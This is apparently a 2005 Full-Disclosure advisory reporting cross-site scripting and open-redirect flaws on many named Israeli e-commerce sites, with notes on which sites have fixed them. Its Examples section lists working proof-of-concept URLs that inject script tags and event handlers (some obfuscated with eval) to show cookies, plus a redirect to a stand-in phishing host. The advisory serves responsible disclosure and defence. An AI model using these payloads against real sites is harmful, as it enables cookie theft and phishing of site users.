Leading Israeli e-commerce sites XSS vulnerabilities advisory
URL:
http://www.raffon.net/advisories/commxss.htmlDate: January 10, 2005
Author: Aviv Raff
Introduction
Many leading Israeli e-commerce sites are phishing enabled, and contain pages which allow injecting code that can execute arbitrary scripts.Technical Details
Many leading Israeli e-commerce sites generate dynamic HTML web pages using user-submitted data, and data from other sources. Most of these sites do not filter the data before presenting it to the user, and therefore are vulnerable to Cross-Site Scripting. They allow injecting code that can execute arbitrary scripts, steal the user's cookie, or display fake pages.P1000 web site allows redirecting to external pages using a simple query string input, which can be easily exploited by phishers.
Examples
NetAction:http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com
Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>alert(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseover=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"
Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</script>
GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.cookie)</script>
Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=<script>alert(document.cookie)</script>
NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>
Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail='><script>alert(document.cookie)</script>
Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.cookie)</script>&type=1&rtype=1
Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)</script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_dot.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>
Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="http://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.cookie)"></iframe>
Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(document.cookie)</script>
One (This is actually a leading sport website, but it has a paid premium section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data="">http://www.one.co.il/search/MoreArticals.asp?data="">
Solutions
All of the sites were contacted via email, or a suggestion form on 27/12/2004.Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already fixed the vulnerabilities.
Wallashops, Issta and Parsi sites are partly fixed.
Other sites are still vulnerable, and one should be careful following a link to those sites, or give confidential information.
Disclaimer: The information in this advisory and any of its
demonstrations is provided "as is" without warranty of any
kind.
-- Copyright © 2004-2005 Aviv Raff.
--_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
